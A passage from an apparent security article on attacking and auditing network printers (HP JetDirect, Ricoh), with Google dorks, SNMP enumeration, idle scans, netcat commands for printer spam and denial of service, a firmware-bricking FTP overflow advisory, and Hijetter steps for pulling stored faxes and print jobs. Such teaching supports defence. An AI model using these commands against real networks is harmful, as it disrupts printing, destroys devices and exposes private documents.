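515/tcp  open  printer    lpd (error: Illegal service request)
9100/tcp open  jetdirect?
MAC Address: 00:00:74:80:7C:B8 (Ricoh Company)
Running: NetBSD
OS details: NetBSD 1.3I through 1.6

Interesting ports on 192.168.1.5:
(The 1661 ports scanned but not shown below are in state: closed)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 3.9p1 (protocol 1.99)
80/tcp   open  http       Apache httpd 2.0.54
Running: Linux 2.4.X|2.5.X|2.6.X
OS details: Linux 2.4.0 - 2.5.20

Nmap finished: 3 IP addresses (3 hosts up) scanned in 120.963 seconds
"""


def parse_nmap(text):
    """Return one dict per host: ip, name, open ports, MAC/vendor, OS guess."""
    hosts, cur = [], None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            cur = {"name": m.group(1) or "", "ip": m.group(2), "ports": {},
                   "mac": "", "vendor": "", "os": ""}
            hosts.append(cur)
            continue
        if cur is None:
            continue
        m = PORT_RE.match(line)
        if m:
            cur["ports"][f"{m.group(1)}/{m.group(2)}"] = (m.group(3), m.group(4) or "")
            continue
        m = MAC_RE.match(line)
        if m:
            cur["mac"], cur["vendor"] = m.group(1), m.group(2)
            continue
        if line.startswith(("Running:", "OS details:")):
            cur["os"] += line.split(":", 1)[1].strip() + " "
    return hosts


def printer_evidence(host):
    """Reasons a host looks like a printer; an empty list means no evidence."""
    reasons = [f"{port} ({label}) open" for port, label in PRINTER_PORTS.items()
               if port in host["ports"]]
    blob = " ".join([host["vendor"], host["os"]]
                    + [f"{svc} {ver}" for svc, ver in host["ports"].values()]).lower()
    hits = [w for w in PRINTER_WORDS if w in blob]
    if hits:
        reasons.append("fingerprint mentions " + ", ".join(hits))
    return reasons


def printer_inventory(text):
    """Map IP -> evidence for every host in the scan that looks like a printer."""
    inventory = {}
    for host in parse_nmap(text):
        reasons = printer_evidence(host)
        if reasons:
            inventory[host["ip"]] = reasons
    return inventory


if __name__ == "__main__":
    for ip, why in printer_inventory(SAMPLE_NMAP_OUTPUT).items():
        print(ip, "->", "; ".join(why))
```

Comparing this inventory against the printers the help desk knows about is the point: a host that answers on 9100/tcp with an HP or Ricoh MAC but is on nobody's list is exactly the unmanaged, password-less device the rest of this article is about.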


Finding Printers with Google

Sometimes for convenience admins will put links to their printers' web interfaces on an Intranet site so they can easily admin them or pull off stored documents. Well, sometimes an Intranet is not really just an Intranet but accessible via the Internet. Google is a great way to find these printers. Here are a few search strings that may be of interest:

Ricoh Savins (Since these printers frequently store documents where they can be downloaded, this can be a real killer for security)

intitle:"web image monitor"

"/web/user/en/websys/webArch/mainFrame.cgi"

inurl:"/en/sts_index.cgi"

HP Jetdirects (Varies greatly from model to model)

inurl:hp/device/this.LCDispatcher

CUPS Connected Printers

inurl:":631/printers" -php -demo

Try combining the above with the Google "site:" parameter to restrict the search to just certain organizations.

For more information on Google Hacking visit http://johnny.ihackstuff.com and search their database of useful Google search strings for "Printers". I obtained some of the above search strings from Johnny's site.

Finding info about the printer using SNMP tools

Using the tools from http://net-snmp.sourceforge.net on a Linux box can yield a great deal of information about a network, assuming no firewalls are blocking the SNMP port (161/udp). The greatly truncated output below should give you some idea as to the kind of information you can get using snmpwalk, including other hosts on the same network, their IPs and MAC addresses, and the features of the printer along with its firmware revision. If you are using a Debian based distribution of Linux try the "apt-get install snmp" command to get these tools.

root@Cthulhu:~# snmpwalk -v 1 -c public 192.168.1.2

SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49

SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2-SMI::enterprises.11.2.3.9.1

SNMPv2-MIB::sysUpTime.0 = Timeticks: (1358074910) 157 days, 4:25:49.10


SNMPv2-MIB::sysContact.0 = STRING:

SNMPv2-MIB::sysName.0 = STRING: NPI6D47C6

SNMPv2-MIB::sysLocation.0 = STRING:

SNMPv2-MIB::sysServices.0 = INTEGER: 64

IF-MIB::ifNumber.0 = INTEGER: 1

IF-MIB::ifIndex.1 = INTEGER: 1

IF-MIB::ifDescr.1 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49

IF-MIB::ifType.1 = INTEGER: ethernetCsmacd(6)

...Omitted for security and space reasons...

IF-MIB::ifOutQLen.1 = Gauge32: 0

IF-MIB::ifSpecific.1 = OID: SNMPv2-SMI::zeroDotZero.0

RFC1213-MIB::atIfIndex.1.1.192.168.19.16 = INTEGER: 1

...Omitted for security and space reasons...

RFC1213-MIB::atIfIndex.1.1.192.168.31.254 = INTEGER: 1

RFC1213-MIB::atIfIndex.1.1.24.0.1.60 = INTEGER: 1

RFC1213-MIB::atPhysAddress.1.1.192.168.19.16 = Hex-STRING: 00 0A 95 A6 6C 00

...Omitted for security and space reasons...

RFC1213-MIB::atPhysAddress.1.1.192.168.31.254 = Hex-STRING: 00 0F 34 E8 DC 38

RFC1213-MIB::atPhysAddress.1.1.24.0.1.60 = Hex-STRING: 01 00 5E 00 01 3C

RFC1213-MIB::atNetAddress.1.1.192.168.19.16 = Network Address: 95:A0:13:10

...Omitted for security and space reasons...

RFC1213-MIB::atNetAddress.1.1.192.168.31.254 = Network Address: 95:A0:1F:FE

RFC1213-MIB::atNetAddress.1.1.24.0.1.60 = Network Address: E0:00:01:3C

IP-MIB::ipForwarding.0 = INTEGER: notForwarding(2)

...Omitted for security and space reasons...

IP-MIB::ipAdEntAddr.192.168.1.2 = IpAddress: 192.168.1.2

...Omitted for security and space reasons...

IP-MIB::ipNetToMediaIfIndex.1.192.168.19.16 = INTEGER: 1

...Omitted for security and space reasons...

IP-MIB::ipNetToMediaIfIndex.1.192.168.31.254 = INTEGER: 1

IP-MIB::ipNetToMediaIfIndex.1.24.0.1.60 = INTEGER: 1

IP-MIB::ipNetToMediaPhysAddress.1.192.168.19.16 = STRING: 0:a:95:a6:6c:0

...Omitted for security and space reasons...

IP-MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING: 0:f:34:e8:dc:38

...Omitted for security and space reasons...

IP-MIB::ipNetToMediaNetAddress.1.192.168.31.254 = IpAddress: 192.168.31.254

...Omitted for security and space reasons...

IP-MIB::ipNetToMediaType.1.192.168.31.254 = INTEGER: dynamic(3)

IP-MIB::ipNetToMediaType.1.24.0.1.60 = INTEGER: dynamic(3)

IP-MIB::ipRoutingDiscards.0 = Counter32: 2801

...Omitted for security and space reasons...

IP-MIB::icmpOutAddrMaskReps.0 = Counter32: 0

TCP-MIB::tcpRtoAlgorithm.0 = INTEGER: vanj(4)

TCP-MIB::tcpRtoMin.0 = INTEGER: 10 milliseconds

TCP-MIB::tcpRtoMax.0 = INTEGER: 120000 milliseconds

...Omitted for security and space reasons...

TCP-MIB::tcpRetransSegs.0 = Counter32: 20

TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER: listen(2)

TCP-MIB::tcpConnLocalAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 192.168.1.2

TCP-MIB::tcpConnLocalPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 21

TCP-MIB::tcpConnRemAddress.192.168.1.2.21.0.0.0.0.0 = IpAddress: 0.0.0.0

TCP-MIB::tcpConnRemPort.192.168.1.2.21.0.0.0.0.0 = INTEGER: 0

TCP-MIB::tcpInErrs.0 = Counter32: 0

TCP-MIB::tcpOutRsts.0 = Counter32: 17832

UDP-MIB::udpInDatagrams.0 = Counter32: 8374653

UDP-MIB::udpNoPorts.0 = Counter32: 8135924

UDP-MIB::udpInErrors.0 = Counter32: 22054

UDP-MIB::udpOutDatagrams.0 = Counter32: 363574

UDP-MIB::udpLocalAddress.0.0.0.0.68 = IpAddress: 0.0.0.0

UDP-MIB::udpLocalPort.0.0.0.0.68 = INTEGER: 68

UDP-MIB::udpLocalAddress.192.168.1.2.137 = IpAddress: 192.168.1.2

The above command works well on JetDirects, Ricoh Savins and other common network printers that support SNMP. If you don't know the proper SNMP community name, a quick sniff of the network with Ettercap or Dsniff should reveal it to you if the admin is using SNMP version 1 or 2. Most times the community name will just be the default "public".
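To make the scale of that leak concrete, here is a small parser, added for this article (not net-snmp's code or the author's), that reads net-snmp's default "MIB::object.index = TYPE: value" text as shown above and pulls out what an auditor would note: the device description and name, the neighbour IP/MAC pairs the printer has cached in its ARP table (the atPhysAddress and ipNetToMediaPhysAddress rows), the hex-encoded atNetAddress values decoded to dotted IPs, and the TCP ports the box is listening on. The walk embedded below is a constructed excerpt in that format; the extra listen rows for 80 and 9100 are assumed for the sake of the example.

```python
"""Summarise what an snmpwalk of a network printer gives away.

Added example for this article, not net-snmp's or the article's own code.
It parses net-snmp's default text output and extracts the items an auditor
cares about. SAMPLE_WALK is a constructed excerpt in that format.
"""
import re

LINE_RE = re.compile(
    r"^(?P<mib>[\w-]+)::(?P<obj>\w+)\.(?P<idx>[\d.]+) = (?P<type>[\w -]+?): ?(?P<val>.*)$"
)

SAMPLE_WALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: HP ETHERNET MULTI-ENVIRONMENT,ROM H_06_01,JETDIRECT EX,JD34,EEPROM H.08.49
SNMPv2-MIB::sysContact.0 = STRING:
SNMPv2-MIB::sysName.0 = STRING: NPI6D47C6
RFC1213-MIB::atPhysAddress.1.1.192.168.19.16 = Hex-STRING: 00 0A 95 A6 6C 00
RFC1213-MIB::atPhysAddress.1.1.192.168.31.254 = Hex-STRING: 00 0F 34 E8 DC 38
RFC1213-MIB::atNetAddress.1.1.192.168.19.16 = Network Address: 95:A0:13:10
IP-MIB::ipNetToMediaPhysAddress.1.192.168.31.254 = STRING: 0:f:34:e8:dc:38
TCP-MIB::tcpConnState.192.168.1.2.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.1.2.80.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.1.2.9100.0.0.0.0.0 = INTEGER: listen(2)
UDP-MIB::udpLocalPort.192.168.1.2.137 = INTEGER: 137
"""


def parse_walk(text):
    """Yield (object, index, type, value) for each well-formed snmpwalk line."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group("obj"), m.group("idx"), m.group("type"), m.group("val")


def normalise_mac(raw):
    """Turn '00 0A 95 A6 6C 00' or '0:a:95:a6:6c:0' into '00:0a:95:a6:6c:00'.

    net-snmp prints the same MAC two ways (Hex-STRING vs STRING), so both
    tables must be normalised before they can be merged.
    """
    octets = re.split(r"[ :]", raw.strip())
    return ":".join(f"{int(o, 16):02x}" for o in octets if o)


def decode_network_address(raw):
    """atNetAddress prints the IPv4 address as hex octets, e.g. '95:A0:13:10'."""
    return ".".join(str(int(o, 16)) for o in raw.split(":"))


def audit_snmpwalk(text):
    """Collect the security-relevant facts from one snmpwalk run."""
    report = {"sysDescr": "", "sysName": "", "neighbours": {}, "listening_tcp": []}
    for obj, idx, typ, val in parse_walk(text):
        if obj in ("sysDescr", "sysName"):
            report[obj] = val
        elif obj == "atPhysAddress":            # index: ifIndex.1.a.b.c.d
            report["neighbours"][".".join(idx.split(".")[2:])] = normalise_mac(val)
        elif obj == "ipNetToMediaPhysAddress":  # index: ifIndex.a.b.c.d
            report["neighbours"][".".join(idx.split(".")[1:])] = normalise_mac(val)
        elif obj == "tcpConnState" and val.startswith("listen"):
            # index: localAddr(4).localPort.remoteAddr(4).remotePort
            report["listening_tcp"].append(int(idx.split(".")[4]))
    report["listening_tcp"].sort()
    return report


if __name__ == "__main__":
    r = audit_snmpwalk(SAMPLE_WALK)
    print(r["sysName"], "-", r["sysDescr"])
    print("listening on TCP:", r["listening_tcp"])
    for ip, mac in sorted(r["neighbours"].items()):
        print(f"neighbour {ip:16} {mac}")
```

Two points worth taking from the output: the neighbour table is a free host list for anyone holding the read community, which is why "public" on a printer matters even though the printer itself holds nothing secret; and the same IP shows up in both ARP tables with differently formatted MACs, so any tooling that merges SNMP data has to normalise before it compares.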

Using a JetDirect box as an Nmap Idlescan Zombie

While I'm on the topic of Nmap and JetDirect boxes, they make great bouncers for stealth Idle scans (also known as Zombie scans) since their IPIDs are incremental. Basically what happens is the Nmap scan is bounced off of the JetDirect box and any logs on the target will show the IP of the JetDirect box as being the attacker. There are a few problems with these kinds of scans, the biggest being that they are VERY slow. For more details on Idle scans see the following URL:

http://www.insecure.org/nmap/idlescan.html

and the Nmap man page:


-sI <zombie host[:probeport]>

Idlescan: This advanced scan method allows for a truly blind TCP port scan of the target (meaning no packets are sent to the target from your real IP address). Instead, a unique side-channel attack exploits predictable "IP fragmentation ID" sequence generation on the zombie host to glean information about the open ports on the target. IDS systems will display the scan as coming from the zombie machine you specify (which must be up and meet certain criteria). I wrote an informal paper about this technique at http://www.insecure.org/nmap/idlescan.html .

Besides being extraordinarily stealthy (due to its blind nature), this scan type permits mapping out IP-based trust relationships between machines. The port listing shows open ports from the perspective of the zombie host. So you can try scanning a target using various zombies that you think might be trusted (via router/packet filter rules). Obviously this is crucial information when prioritizing attack targets. Otherwise, you penetration testers might have to expend considerable resources "owning" an intermediate system, only to find out that its IP isn't even trusted by the target host/network you are ultimately after.

You can add a colon followed by a port number if you wish to probe a particular port on the zombie host for IPID changes. Otherwise Nmap will use the port it uses by default for "tcp pings".

Here is an example of Nmap being run using a JetDirect box as a bouncer. I've used the -P0 option so that the host running Nmap does not ping the target first, since that would lessen the stealth value by giving away the scanner's true IP.

Irongeek:~# nmap -P0 -sI 192.168.1.93 Irongeek.irongeek.com

Starting nmap 3.81 ( http://www.insecure.org/nmap/ ) at 2005-09-08 17:22 EDT
Idlescan using zombie 192.168.1.93 (192.168.1.93:80); Class: Incremental
Interesting ports on 192.168.1.5:
(The 1654 ports scanned but not shown below are in state: closed|filtered)
PORT    STATE SERVICE
22/tcp  open  ssh
25/tcp  open  smtp
80/tcp  open  http
110/tcp open  pop3
111/tcp open  rpcbind
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
587/tcp open  submission

Nmap finished: 1 IP address (1 host up) scanned in 35.262 seconds
Irongeek:~#

Now, if 192.168.1.5 looks at its logs it will appear that 192.168.1.93 (the JetDirect box) was doing the scan. Sneaky!
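The "Class: Incremental" line in that output is the whole story: the JetDirect hands out IP IDs from one global counter, so anyone who can get a RST out of it can count how many packets it has sent in between. The following Python model is an added example for this article (not Nmap's code, and it sends no packets); it replays the bookkeeping the man page text above describes against two hypothetical zombie stacks, one with the JetDirect's incrementing counter and one that randomises the ID per packet, to show that the second one tells the scanner nothing. Class names, the start value and the seeds are this example's own.

```python
"""Model of the IP ID side channel behind the Nmap idle scan.

Added example for this article, not Nmap's code; nothing here touches the
network. Two hypothetical zombie stacks are compared: an incrementing
global IP ID counter (what Nmap reported as "Class: Incremental" for the
JetDirect above) and a per-packet random IP ID.
"""
import random


class IncrementalIpId:
    """One global counter, bumped for every packet the host sends."""

    def __init__(self, start=1000):
        self.current = start

    def send_packet(self):
        self.current += 1
        return self.current


class RandomIpId:
    """A fresh random IP ID for every packet (what a hardened stack does)."""

    def __init__(self, seed=0):
        self.rng = random.Random(seed)

    def send_packet(self):
        return self.rng.randrange(65536)


def probe_ipid(zombie):
    """Scanner sends the zombie an unsolicited SYN/ACK; the RST the zombie
    answers with carries the IP ID the scanner reads."""
    return zombie.send_packet()


def target_reacts(zombie, port_open):
    """Scanner sends the target a SYN forged from the zombie's address.
    Open port: the target SYN/ACKs the zombie, which replies RST (one packet).
    Closed port: the target RSTs the zombie, which ignores it (no packet)."""
    if port_open:
        zombie.send_packet()


def infer_port_state(zombie, port_open):
    """One idle-scan round against one port; the scanner sees only two IP IDs."""
    before = probe_ipid(zombie)
    target_reacts(zombie, port_open)
    after = probe_ipid(zombie)
    delta = (after - before) % 65536
    if delta == 1:
        return "closed"
    if delta == 2:
        return "open"
    return "unknown"


def leak_count(zombie_factory, rounds=50):
    """How many of `rounds` probes of an open port are correctly read as open.

    zombie_factory(i) builds a fresh zombie for round i (start value or seed).
    """
    return sum(infer_port_state(zombie_factory(i), True) == "open"
               for i in range(rounds))


if __name__ == "__main__":
    print("incremental zombie leaks", leak_count(IncrementalIpId), "of 50 rounds")
    print("random-ID host leaks    ", leak_count(RandomIpId), "of 50 rounds")
```

The practical reading for an admin is the mirror image of the author's point: a port scan that your logs attribute to a printer's address is most likely someone bouncing off the printer, not the printer itself misbehaving, and the fix is to stop unsolicited traffic from reaching the print VLAN rather than to "clean" the printer.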

Setting up a direct IP printer in Windows and Linux

Setting up a direct IP printer can be useful from time to time; here are a few reasons why you might want to set one up:

1. Your main print server is unreliable.

2. Sometimes cutting out the middle man makes a print job work when normally it would not. Some PDFs used to give me fits when I used a Windows 2000 server to host print shares, but printing directly to the IP printer worked like a charm.

3. To bypass access rights to a printer or to get around print tracking software like Pharos Uniprint or Equitrac.

Rather than waste space on how to set up direct IP printing in Windows I'll point you to Microsoft's howto:

http://www.microsoft.com/technet/prodtechnol/windowsserver2003/library/ServerHelp/25468cbe-faab-424c-aae5-ddd333436c0d.mspx

and HP's:

http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpj06391

If you wish to script the installation in Windows check out:

https://engineering.purdue.edu/ECN/Resources/KnowledgeBase/Docs/20040216090320

For you Linux users it's pretty easy to set up a direct IP printer too. Make sure you have CUPS (Common Unix Printing System) installed (for us Debian folks: apt-get install cupsys). Most Linux distributions have a GUI setup wizard now, but you can also add a direct IP printer from the shell by using a command like the following:

foomatic-configure -s cups -n My-Remote-JetDirect -c socket://192.168.1.2:9100/

Of course, you will want to change the IP and maybe the name to reflect your network and printer setup. If for some reason

http://192.168.4.2:631/printer

http://192.168.4.2:631/ipp

Spamming Printers

I'm rather surprised that, with the amount of E-mail, Net Message and Fax spam around, no one seems to have tried Printer Spam. First, the attacker would need to have something to iterate through printers. I wrote a quick tool for Linux and Windows called IPIterator that does just this:

http://www.irongeek.com/i.php?page=security/ipiterator

The following example assumes that port 9100/tcp is open past the firewall (don't laugh, I've seen it), but with some modification I'm pretty sure it could be made to work with IPP and FTP enabled printers too. All one has to do is generate a PostScript or PCL file containing the spam message they want to send. The Windows "Print to File" option works well for this. In a pinch a plain old text file will also work. Then they can use Netcat and IPIterator to send the print job to a whole IP range of printers.

Irongeek@Irongeek:~# ./ipiterator 192.168.3.1-5,25,"cat spam.prn|netcat -q 0 ~ip 9100"
cat spam.prn|netcat -q 0 192.168.3.1 9100
Starting thread 1
cat spam.prn|netcat -q 0 192.168.3.2 9100
Starting thread 2
cat spam.prn|netcat -q 0 192.168.3.3 9100
Starting thread 3
cat spam.prn|netcat -q 0 192.168.3.4 9100
Starting thread 4
cat spam.prn|netcat -q 0 192.168.3.5 9100
Starting thread 5
DONE
Irongeek@Irongeek:~#

Evil I know, maybe I should not have mentioned it as now it may become more common. This facility might also be legitimately useful for sending out mass messages on a network where you work.

Side note on a Pharos Uniprint vulnerability

While this is not directly related to the article's main topic I thought that some of you would be interested in knowing about a vulnerability with the Pharos Uniprint system. It looks like Pharos Uniprint saves the last print jobs sent to a printer into C:\Program Files\Pharos\Temp\PORT*.PRN as a simple PCL print job which is readable by everyone on the Windows box by default. With a quick NetCat command (seen later in this article in the sniffing and replay section) or an FTP of the file to a JetDirect box it's easy to see what others have been printing out on that Windows workstation. Not very secure huh? It seems that Pharos did fix this in later versions, as Edward Burhenn stated in his email to me:


This was a "bug" in an older version of Pharos for which a hot fix was released:

The application of Pharos 7.0 Hot Fix 1 ensures that no more spool file copies will be retained after print jobs for both Popups and non-Popups printers. Existing copies of old spool files in the ...\Pharos\Temp folder will need to be deleted manually.

To avoid any further confusion could you post an update to the article, perhaps directing folk to the hot fix which can be downloaded from our website:

http://www.pharos.com/Support/index.html?

Thanks,

Ed

Edward Burhenn

Technical Specialist

DoSing the network or the printer

As should be obvious by now for those that have been paying attention, it's pretty trivial to cause a DoS (Denial of Service) attack with a JetDirect box that's not password protected. A deviant user could just use the telnet or web interface to set the IP of the JetDirect to the same IP as the gateway - instant routing confusion. Another option for network mayhem would be to set the host name of the JetDirect box to that of another box on the network. This would mess a few things up if the facility uses dynamic DNS for host names. Also notice from the UDP port scan shown earlier that the JetDirect box is running the NetBIOS naming service, so changing the host name on a Windows network could cause name resolution problems.

As for DoSing the printer, if someone wanted to be a dick they could just hop onto their *nix box and cat their hard drive to the printer, causing a print job the size of the local hard drive:

cat /dev/hda|netcat -q 0 192.168.1.2 9100

Much the same thing could be accomplished by FTPing your swap file to a JetDirect box that accepts FTP print jobs.

Another thing that could be done is to upload a corrupted firmware to the JetDirect box. This can be done by obtaining the HP Download Manager from:

http://www.hp.com/go/dlm_sw

and then attempting an upgrade of the firmware, but stopping the process halfway through. The JetDirect will be non-responsive until a full firmware is uploaded again. An interesting side note: you can upgrade the firmware on a JetDirect even if you don't know the JetDirect's system password. Why HP did not require a password for a firmware update I have no idea; it just seems like common sense that they would. From reading Slobotron's article (linked at the bottom) it would seem you can also upgrade the firmware with Netcat.

On a lark I decided to test out the effects of connecting to port 9100/tcp and holding the connection open using the Telnet command. I tested it on a Ricoh Savin Aficio 2045e and a JetDirect 300x (J3263A) and the result was that the connection to port 9100/tcp seems to be single threaded. While I held the Telnet connection to port 9100 no other print jobs could be sent to the printer! The connection should time out after a while. Imagine if someone used an active connection on the LAN and a command like:

./ipiterator 192.168.1.*,25,"telnet ~ip 9100"

to knock out printing to a whole LAN! See the section above for more info on IPIterator.


Because of the relatively weak IP stacks in most network printers there are a lot of other little Denial of Service exploits. I recommend checking out http://www.securityfocus.com/bid/ for more DoS attacks. One of the more interesting attacks to be found recently (12/19/2006) comes from researcher Joxean Koret. I've got to thank the Pauldotcom podcast (episode 55) for pointing it out to me. It seems that Mr. Koret found a flaw in some HP JetDirects that permanently bricks the print server to the point it has to be sent back to HP to be fixed. For those that don't understand the term "brick", it means that the device has been made inoperable because of a bad firmware or an electrical problem. This is a serious flaw since it effectively turns the JetDirect into a paperweight. In Joxean Koret's words:

HP FTP Printer Server Denial Of Service

---------------------------------------

Author: Joxean Koret

Date: 2006

Location: Basque Country

Affected Software

-----------------

Vendor: Hewlett Packard

Description: HP Printers FTP Server Denial Of Service

Description

-----------

A problem exists in almost any currently used HP Printer with the FTP Print Server.

Version 2.4 of the FTP Print Server will crash with only one shoot. Version 2.4.5, which is latest, will need various shoots (the number of shoots needed is currently unknown).

While playing with my own FTP Fuzzer I tried finding flaws in HP's Printers. After trying with 5 printers I found the problem in all of these. The problem is a buffer overflow in the LIST and NLST command. In version 2.4 a single shoot sending a LIST command with a long string (about 256 characters) is sufficient enough to test the vulnerability. Take care trying it because two of my printers were crashed completely (you will need to make use of your warranty ;] ). Against 2.4 versions it can crash the complete printer and be unresponsive even after rebooting it.

In version 2.4.5 (which is the latest) you need to send various times long shoots to the parameter LIST (a single shoot will not crash, printer will answer with a "Path too long" message). You will need to send various times a LIST command with long strings. When trying with other commands you will see that no problem is raised and the printer will always be responsive. After a successful attack you may completely crash your printer (i.e., calling technical support to fix your crashed printer).

The problem can be easily triggered by using any FTP fuzzing tool. You can crash your printer in about 10 second(s) in a LAN.

The printer models I used in my tests are:

* HP LaserJet 5000 Series (firmware R.25.15 / R.25.47)

* HP LaserJet 5100 Series (firmware V.29.12)


Attached goes POCs for the vulnerabilities.

Workaround

----------

Disable the FTP print server as, surely, you aren't using it.

Disclaimer

----------

The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.

Contact

-------

Joxean Koret < joxeankoret [at] yah00 [D0T] es >

--

-----------------------------------

Agian, agian, egun batez

jeikiko dira egiazko Ziberotarrak,

egiazko euskaldunak,

tirano arrotzen hiltzeko

eta gure aiten aitek utzi daikien

lurraren populiari erremetitzeko.

-----------------------------------

It is not yet known which JetDirect print servers are affected by this exploit as few people want to take the chance of destroying their own. I've mirrored his two proof of concept scripts if anyone would like to test them and let me know which JetDirects it works on:

jd-dos2.4.5.py

jd-dos2.4.py

MITRE lists this bug as CVE-2006-6742. The buffer overflow in the LIST and NLST commands seems to overwrite part of the firmware, so my best guess is that cheaper print servers without flash memory like the 170x are probably safe. From what I'm hearing HP is not taking this threat as seriously as they should given that someone could cripple printing for days at a corporation using this exploit and a tool like IPIterator. The only known fix as of yet is a preventative one, and that is to turn off the JetDirect's FTP service or to block port 21/TCP at the border of the network the print server is on. If anyone has more information on this flaw please email me. See:

http://www.security.nnov.ru/Gnews955.html for more info on this vulnerability.

By the way, don't be the kind of person that would use one of the above techniques, I only mention them so that admins know what they need to guard against.

Update 01/20/2007: Looks like HP may have fixed this issue with a newer firmware:

http://www.securitytracker.com/alerts/2007/Jan/1017532.html

Still, if anyone has more information please email me.

Changing the LCD display text using HPhack, IGhphack or Hijetter


This is an old hack (1997) and does not accomplish much, but it is fun! Silicosis of L0pht ([email protected]) wrote the original exploit code for *nix systems and someone else ported it to NT/2000/XP based systems. Although it's been out there for a long time, it still works on every HP printer/JetDirect box I have seen. What the HP display hack allows you to do is set the text that displays on the little LCD panel of an HP printer. It accomplishes this over the network by sending packets to a JetDirect box hooked to the printer (or built into it).

The first thing you need to do is find out the IP or hostname of the JetDirect box that services the printer. You can do this in one of at least three ways. The first way is by hitting the little test button on the JetDirect box that's connected to the printer. If the JetDirect card is built in you may have to go through the menus and choose "Print Configuration". Another way is to go into your "Printers and Faxes" settings, right click and bring up the properties of the printer in question, and look under the Ports tab for the hostname (npi******). Once you have this information it's easy to run Silicosis' little hack.

To run it from Windows just use the following syntax: hpnt Hostname Message

Windows Example:

C:\>hpnt npi769e71 "Irongeek"
HP Display hack -- [email protected]: npi769e71
Message: Irongeek
Connecting....
Sent 54 bytes

C:\>hpnt 192.168.1.14 "Irongeek Also"
HP Display hack -- [email protected]: 192.168.1.14
Message: Irongeek Also
Connecting....
Sent 59 bytes

C:\>

If you want to run it from Linux download the source code at the bottom of this section and compile it using gcc. The syntax is the same as the Windows version. Below is an example of how to compile and run it:

[root@balrog root]# gcc -o hphack hp.c
hp.c:28:12: warning: multi-line string literals are deprecated
[root@balrog root]# ./hphack 192.168.1.14 "Irongeek"
HP Display hack -- [email protected]: 192.168.1.14
Message: Irongeek
Connecting....
Sent 54 bytes
[root@balrog root]#

A few ideas for messages: "Hey Baby", "X was Here", "I see You", "Redrum", "Kill". Enjoy. If you like you can download Silicosis' hack from one of these links:

Unix Source

Windows Source

Windows Binary

I'm working on my own GUI version with extra features; its web page can be found here:

http://www.irongeek.com/i.php?page=security/jetdirecthack

Unfortunately it's pretty buggy.


The easiest tool to use may be Hijetter by

FtR of Phenoelit, which is covered in the next

section.

Phenoelit's Hijetter and PFT

Hijetter seems to be the Swiss army knife of HP JetDirect hacking. It can control a JetDirect box with PJL

commands, and works even if a password is set (at least on my HP JetDirect 300X). You can download the binary

and the source code for this app from:

http://www.phenoelit.de/hp/download.html

Below is a screen shot of Hijetter's interface. To use Hijetter just type in the IP or host name of your JetDirect

box and click the connect icon.

You should notice that a few of the icons at the bottom of the interface light up.

You can only use the icons that are lit up. The first icon, from left to right, lets you control the file system on the

JetDirect (if it has one), the next icon lets you make changes to the settings and the last icon lets you set the text that

displays on the LCD screen. I'll cover these tasks in reverse order since I'm contrary like that.

Setting the LCD Display with Hijetter

1. After you have connected to the JetDirect box click the LCD Display icon.

2. Type in the message you want the printer's LCD to display.


3. If you check the "Failure" radio button the printer will stop printing until someone hits the ok/continue/online button on the printer, or it's reset.

4. Click the confirm button and your message should now appear on the printer's LCD.

Changing settings with Hijetter

1. After you have connected to the JetDirect box click the settings icon.

2. Find the environment variable you want to change and type in the value you want to set it to, keeping in mind the limitations listed in the "Info" panel.

3. Use the assign button to set your change. An M should appear next to the variable you changed.

4. Click the confirm button and you're done.

Using Hijetter to treat some JetDirect boxes as files/web servers

1. After you have connected to the JetDirect box click the File System icon.

2. Use the arrows to transfer files between your client and the JetDirect box. Keep in mind that you can only transfer one file at a time with Hijetter.

3. The New Folder and Delete icons can be used for their obvious functions.


4. Click the confirm button and you're done.

Finding stored faxes and print jobs on Jetdirect printers

Look around the file system and download any files that look interesting. Most of them don't have obvious file

extensions, so open them up in a text editor and look at the headers to try and figure out what they are. Here are a few

of the things I've found by searching around this way:

Location                      What I've found
/saveDevice/DigitalSend/jobs  Jpegs with names like DS000848.005 that seem to be either print jobs or faxes.
/FaxOut                       Tif files from sent faxes.
/FaxIn                        PCL files from received faxes. See my NetCat and FTP tricks later for more information on how to print them.
/Fax/act.log                  Seems to be a log of phone numbers where things have been faxed to or from. Could be useful for social engineering.

Also notice that the Hewlett-Packard LaserJet 4100 MFP we connected to has a 20Gig hard drive, which makes

for a great place to hide and serve large files. I've noticed on the MFP a file can be uploaded to:

/webserver/home/

and can be accessed from the printer's web interface at:

http://192.168.1.4/hp/device/

For example, if you used Hijetter to upload "naughtylinuxgirls.avi" to "/webserver/home/" it can be accessed

from the web with the URL:

http://192.168.1.4/hp/device/naughtylinuxgirls.avi

Feel free to put your homepage on a printer. :)

If you're a *nix or Windows command line boy, don't despair. The same folks from Phenoelit have provided PFT,

a command line utility that can do many of the same things as Hijetter. It can be downloaded and installed with these

commands:

mkdir pjllib
cd pjllib
wget http://www.phenoelit.de/hp/libPJL-1.3-src.tgz
tar -xzf libPJL-1.3-src.tgz
make
cd pft/
make

Here is an example of what it looks like on the command line after you bring up the help page; look at all of the

options:

Irongeek:/home/adrian/pjllib/pft# ./pft
PFT - PJL file transfer
FX of Phenoelit <[email protected]>
Version 0.7 ($Revision: 1.8 $)

pft> help
help <command>
quit
server [hostname]
port [port number]
connect
close
env {read|print|show|set|options|changed|commit|unprotect|bruteforce}
message "Display Msg"
failure "Failure Msg"
volumes
chvol [vol:]
